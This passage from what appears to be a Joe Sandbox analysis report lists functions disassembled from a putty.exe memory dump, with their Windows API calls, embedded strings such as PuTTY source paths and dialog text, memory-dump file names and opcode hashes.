Function 00007FF6BB353210 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF6BB34A691,?,?,?,?,00007FF6BB356773,?,?,00000000,00007FF6BB35332E,?,?,?), ref: 00007FF6BB35321F
FlsSetValue.KERNEL32(?,?,?,00007FF6BB34A691,?,?,?,?,00007FF6BB356773,?,?,00000000,00007FF6BB35332E,?,?,?), ref: 00007FF6BB353255
FlsSetValue.KERNEL32(?,?,?,00007FF6BB34A691,?,?,?,?,00007FF6BB356773,?,?,00000000,00007FF6BB35332E,?,?,?), ref: 00007FF6BB353282
FlsSetValue.KERNEL32(?,?,?,00007FF6BB34A691,?,?,?,?,00007FF6BB356773,?,?,00000000,00007FF6BB35332E,?,?,?), ref: 00007FF6BB353293
FlsSetValue.KERNEL32(?,?,?,00007FF6BB34A691,?,?,?,?,00007FF6BB356773,?,?,00000000,00007FF6BB35332E,?,?,?), ref: 00007FF6BB3532A4
SetLastError.KERNEL32(?,?,?,00007FF6BB34A691,?,?,?,?,00007FF6BB356773,?,?,00000000,00007FF6BB35332E,?,?,?), ref: 00007FF6BB3532BF

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 1148fc4c0d35bbd3a571b67db096fae2734cc6304b1922bc55f22b24f00a6c59
Instruction ID: 3ae1bd143c7ccf36ee3c5d0d4301a5faf11a8ab15ca151cbca54610dc8f72cbf
Opcode Fuzzy Hash: 1148fc4c0d35bbd3a571b67db096fae2734cc6304b1922bc55f22b24f00a6c59
Instruction Fuzzy Hash: 7C114D24A0CA4642FAA467699A9117D62527F4C7F0F140335EB3E86AF6DE2CF4424709

Function 00007FF6BB35CB84 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 305fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF6BB35CC0B
WriteFile.KERNEL32 ref: 00007FF6BB35CED2
WriteFile.KERNEL32 ref: 00007FF6BB35CF1B
GetLastError.KERNEL32 ref: 00007FF6BB35CFDC

Strings

MZx, xrefs: 00007FF6BB35CBDE, 00007FF6BB35CC5E, 00007FF6BB35CD0F

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID: MZx
API String ID: 2718003287-2575928145
Opcode ID: 84bb804351b2715cd8c68702ce643e48e67f41c0ca54e1dbf60fe47e9234377e
Instruction ID: efe81a9c74183f0552f328fba8e2c4222c4ab507d85a5f91777ada2a2cce8f95
Opcode Fuzzy Hash: 84bb804351b2715cd8c68702ce643e48e67f41c0ca54e1dbf60fe47e9234377e
Instruction Fuzzy Hash: BCD1E122B08A8589EB10CF7DD9401AC3BB1FB49B98B584236DF4DD7BA9DE38D456C704

Function 00007FF6BB2C9170 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(FFFFFFFE,00000000,0000022950716DA0,?,00000000,00000000,00000000,?,00007FF6BB2C7CA2), ref: 00007FF6BB2C92A5

Strings

UTF-8, xrefs: 00007FF6BB2C91B5

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Info
String ID: UTF-8
API String ID: 1807457897-243350608
Opcode ID: 31daed4d13549b50bec842ae628bc01fa7fd1093a734074d9845411709ca4802
Instruction ID: e8adae8148e57cc642330d43e3150fc56040814f9ec88ddb6a5254a9bf1f5f78
Opcode Fuzzy Hash: 31daed4d13549b50bec842ae628bc01fa7fd1093a734074d9845411709ca4802
Instruction Fuzzy Hash: 87710322F0C58241FA765B3D5A9223E6AA17F8E364F181235DF9E876F1DE3DE8418341

Function 00007FF6BB358CFC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 162COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BB353098: GetLastError.KERNEL32(?,?,?,00007FF6BB342CFB,?,?,?,00007FF6BB34C131), ref: 00007FF6BB3530A7
Part of subcall function 00007FF6BB353098: FlsGetValue.KERNEL32(?,?,?,00007FF6BB342CFB,?,?,?,00007FF6BB34C131), ref: 00007FF6BB3530BC
Part of subcall function 00007FF6BB353098: SetLastError.KERNEL32(?,?,?,00007FF6BB342CFB,?,?,?,00007FF6BB34C131), ref: 00007FF6BB353147

TranslateName.LIBCMT ref: 00007FF6BB358D69
TranslateName.LIBCMT ref: 00007FF6BB358DA4
GetACP.KERNEL32(?,?,?,00000000,00000092,00007FF6BB348900), ref: 00007FF6BB358DE9
IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FF6BB348900), ref: 00007FF6BB358E11

Strings

utf8, xrefs: 00007FF6BB358EF5

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ErrorLastNameTranslate$CodePageValidValue
String ID: utf8
API String ID: 1791977518-905460609
Opcode ID: 147aec7f4f243be30fdf1adca31b102f843554426d767e7d2694068b4c2702b6
Instruction ID: fee93b6226bd76d67731e076b264a79f84418beb04ee454cc78c0ccfcc408048
Opcode Fuzzy Hash: 147aec7f4f243be30fdf1adca31b102f843554426d767e7d2694068b4c2702b6
Instruction Fuzzy Hash: AF517E22B0874282EB64AF2AE8106B963A5BF5CB80F444531DF4D877E5EF3CE945C719

Function 00007FF6BB3669FC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6BB366A2A

Part of subcall function 00007FF6BB3668B4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB3668C8

_get_daylight.LIBCMT ref: 00007FF6BB366A4C

Part of subcall function 00007FF6BB366884: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB366898

Part of subcall function 00007FF6BB3544E4: HeapFree.KERNEL32(?,?,?,00007FF6BB358382,?,?,?,00007FF6BB357F43,?,?,00000000,00007FF6BB358C14,?,?,?,00007FF6BB358B1F), ref: 00007FF6BB3544FA
Part of subcall function 00007FF6BB3544E4: GetLastError.KERNEL32(?,?,?,00007FF6BB358382,?,?,?,00007FF6BB357F43,?,?,00000000,00007FF6BB358C14,?,?,?,00007FF6BB358B1F), ref: 00007FF6BB354504

GetTimeZoneInformation.KERNEL32(?,?,00000000,00000000,?,00007FF6BB366F58), ref: 00007FF6BB366A73
_get_daylight.LIBCMT ref: 00007FF6BB366A3B

Part of subcall function 00007FF6BB366854: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB366868

Strings

?, xrefs: 00007FF6BB366C2D

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID: ?
API String ID: 3458911817-1684325040
Opcode ID: f20ff13d110c062c7a24faccda77cd1f8ebd87376358724fd8a91b8ccfae5989
Instruction ID: 0781e496c4b8a472e5dcdbb5295bc2057b60f618e8d6178476bbf593c7579205
Opcode Fuzzy Hash: f20ff13d110c062c7a24faccda77cd1f8ebd87376358724fd8a91b8ccfae5989
Instruction Fuzzy Hash: 93412132A0C6428AE724EF7AD8914E96761BF8D784B445539EB4EC3AB6DF3CE4408744

Function 00007FF6BB2A439F Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BB2D6500: GetLocalTime.KERNEL32(?,?,?,?,?,?,?,00007FF6BB2AB996), ref: 00007FF6BB2D651C

wcsftime.LIBCMT ref: 00007FF6BB2A43DD
SendDlgItemMessageA.USER32 ref: 00007FF6BB2A4466
SendDlgItemMessageA.USER32 ref: 00007FF6BB2A4486
SendDlgItemMessageA.USER32 ref: 00007FF6BB2A44A9

Strings

%Y-%m-%d %H:%M:%S, xrefs: 00007FF6BB2A43C9

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ItemMessageSend$LocalTimewcsftime
String ID: %Y-%m-%d %H:%M:%S
API String ID: 2023452587-819171244
Opcode ID: 507153ed6363218af08e470e8d5140e7466e122795bedff6dd483ee442a0280b
Instruction ID: afc6e6bee5c62a03de9f4668796a612a25d7781507f9b6dffb53060e69d5efc5
Opcode Fuzzy Hash: 507153ed6363218af08e470e8d5140e7466e122795bedff6dd483ee442a0280b
Instruction Fuzzy Hash: 6B415A35A18A0286EB549B18E9A17BD2350FB8C790F644236DA5EC7AF4DF3DF5068B00

Function 00007FF6BB34C6F8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB34C771
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB34C7D6
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB34C812
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB34C843

Strings

MZx, xrefs: 00007FF6BB34C710

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: MZx
API String ID: 3215553584-2575928145
Opcode ID: 25fad6976c932c39ade4dc38632b6ecb5dc914d422e75369aa4b4ee0e3536537
Instruction ID: 2009a3087edac3a2fc8b9eaa2829519e426e739796193386b3aa578ee8a6b748
Opcode Fuzzy Hash: 25fad6976c932c39ade4dc38632b6ecb5dc914d422e75369aa4b4ee0e3536537
Instruction Fuzzy Hash: DD4194269097C59AE7629F29D4602BD3FA4BF09B84F8C8030D78C87766CE7EA405C312

Function 00007FF6BB2BF6C0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 76COMMON

Download Yara Rule

APIs

htonl.WS2_32 ref: 00007FF6BB2BF764

Strings

addr->addresses && step.curraddr < addr->naddresses, xrefs: 00007FF6BB2BF745
family != AF_UNSPEC, xrefs: 00007FF6BB2BF6E7
false && "bad address family in sk_addrcopy", xrefs: 00007FF6BB2BF774
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/network.c, xrefs: 00007FF6BB2BF6EE, 00007FF6BB2BF74C, 00007FF6BB2BF77B

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: htonl
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/network.c$addr->addresses && step.curraddr < addr->naddresses$false && "bad address family in sk_addrcopy"$family != AF_UNSPEC
API String ID: 2009864989-3860342078
Opcode ID: b80c84d2d0a7ea5aa3e67d59ae52550a92a220f7f2d47797fdda78254e25d04c
Instruction ID: 2d5952e1923f62a47b25f103b714227acdec41ab8e8e388fc6475152e81e189c
Opcode Fuzzy Hash: b80c84d2d0a7ea5aa3e67d59ae52550a92a220f7f2d47797fdda78254e25d04c
Instruction Fuzzy Hash: 6E212825A0864692FE759B1DD6802BC22A0FF5DB54F288471CB4DC76B1EE3DE986D700

Function 00007FF6BB2A9DF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 74windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32 ref: 00007FF6BB2A9E97
SendDlgItemMessageA.USER32 ref: 00007FF6BB2A9EDA

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00007FF6BB2A9E42, 00007FF6BB2A9E6A
c->ctrl->listbox.height != 0, xrefs: 00007FF6BB2A9E63
c && c->ctrl->type == CTRL_LISTBOX, xrefs: 00007FF6BB2A9E3B

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ItemMessageSend
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && c->ctrl->type == CTRL_LISTBOX$c->ctrl->listbox.height != 0
API String ID: 3015471070-1665001371
Opcode ID: b9bfb3989dc0ab2d47890ac25385cde08b85174cec19ee0b90f6dc49dabb0509
Instruction ID: 055fd8687881f7b67ae3138e0c2a241f3dce7860b71a531fc52bc0c064ef0d87
Opcode Fuzzy Hash: b9bfb3989dc0ab2d47890ac25385cde08b85174cec19ee0b90f6dc49dabb0509
Instruction Fuzzy Hash: 3F315832B0850585FA208B1EDA4577967A1FB88B98F858136CB1D877A2DF3DE846CB00

Function 00007FF6BB2BF0F0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72COMMON

Download Yara Rule

APIs

htonl.WS2_32 ref: 00007FF6BB2BF1A3
inet_ntoa.WS2_32 ref: 00007FF6BB2BF1AB

Strings

addr->addresses && step.curraddr < addr->naddresses, xrefs: 00007FF6BB2BF184
<unknown>, xrefs: 00007FF6BB2BF163
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/network.c, xrefs: 00007FF6BB2BF18B

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: htonlinet_ntoa
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/network.c$<unknown>$addr->addresses && step.curraddr < addr->naddresses
API String ID: 298042256-529704717
Opcode ID: 438a5ba1e524eaa18862dbd65f4a01b488d93b2803a10fe3e36ee1f8c1a15f2d
Instruction ID: 3e32d37fa6d19e75b7cbd8a48e80a29eae4d88860194b69d97d1eb731837d9a1
Opcode Fuzzy Hash: 438a5ba1e524eaa18862dbd65f4a01b488d93b2803a10fe3e36ee1f8c1a15f2d
Instruction Fuzzy Hash: 6A217C62B2861285FE248B2AE85067D23A0BF8DFC4F945531DF4D977A5DE3CE4428B00

Function 00007FF6BB281B30 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 71windowCOMMON

Download Yara Rule

APIs

ShowCursor.USER32 ref: 00007FF6BB281B4F
MessageBoxA.USER32 ref: 00007FF6BB2823C1
DestroyWindow.USER32 ref: 00007FF6BB2823CF

Strings

Are you sure you want to close this session?%s%s, xrefs: 00007FF6BB282385
%s Exit Confirmation, xrefs: 00007FF6BB281B63

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: CursorDestroyMessageShowWindow
String ID: %s Exit Confirmation$Are you sure you want to close this session?%s%s
API String ID: 1466741823-1096320758
Opcode ID: 5babf984b154317977c6c952352b068deff14ff01d67093842571732cb045673
Instruction ID: cacdd4a48facd7ed347c4ddd8f8b2478906795fc09509c5b91f2be1895d3cca1
Opcode Fuzzy Hash: 5babf984b154317977c6c952352b068deff14ff01d67093842571732cb045673
Instruction Fuzzy Hash: 10218861E0D94644FE01AB19AA953B92291BF8CBD0F944831CF0EC76B2EE3CE4828711

Function 00007FF6BB286DA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 00007FF6BB286DF9
UnmapViewOfFile.KERNEL32 ref: 00007FF6BB286E3F
CloseHandle.KERNEL32 ref: 00007FF6BB286E4A

Strings

%p:%u, xrefs: 00007FF6BB286DC5
Serialised configuration data was invalid, xrefs: 00007FF6BB286E71

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: FileView$CloseHandleUnmap
String ID: %p:%u$Serialised configuration data was invalid
API String ID: 2927507641-1340088990
Opcode ID: 9d57c90434684aaf2965970c8f0240be98aef44ae6faf4afbbb2f39bb53a8b90
Instruction ID: c8af04378575fbe98cbcf25f74bf0cf8276876d8e8dce23d1a9640be02103d86
Opcode Fuzzy Hash: 9d57c90434684aaf2965970c8f0240be98aef44ae6faf4afbbb2f39bb53a8b90
Instruction Fuzzy Hash: 6F214F31A19A8582EA519B18EA5477E73A0FF88B84F604135EB8D87B74DF3CD446CB00

Function 00007FF6BB2819E8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BB299B60: GetCaretBlinkTime.USER32 ref: 00007FF6BB299B84

CreateCaret.USER32 ref: 00007FF6BB281A0E
ShowCaret.USER32 ref: 00007FF6BB281A17
FlashWindow.USER32 ref: 00007FF6BB282FEF
DefWindowProcW.USER32 ref: 00007FF6BB283732

Strings

, xrefs: 00007FF6BB281A52

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Caret$Window$BlinkCreateFlashProcShowTime
String ID:
API String ID: 3048652251-3916222277
Opcode ID: 7d8abb54fdfaeffb200c07e0e3071c8cc211ee267e447a3fee1c274b4c34ed4b
Instruction ID: bcf26620408a340be003843260d21f6b43b60595c4a44627bfeb927860369796
Opcode Fuzzy Hash: 7d8abb54fdfaeffb200c07e0e3071c8cc211ee267e447a3fee1c274b4c34ed4b
Instruction Fuzzy Hash: 8B211435A0964285FA11DB19ED643BE2760BF8CB94F640035CE4E87BB5DF7CA0859B00

Function 00007FF6BB28C790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51windowCOMMON

Download Yara Rule

APIs

GetWindowLongPtrA.USER32 ref: 00007FF6BB28C7A2
SetWindowLongPtrA.USER32 ref: 00007FF6BB28C80A
SetWindowPos.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF6BB2837BD), ref: 00007FF6BB28C837
CheckMenuItem.USER32 ref: 00007FF6BB28C853

Strings

', xrefs: 00007FF6BB28C817

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

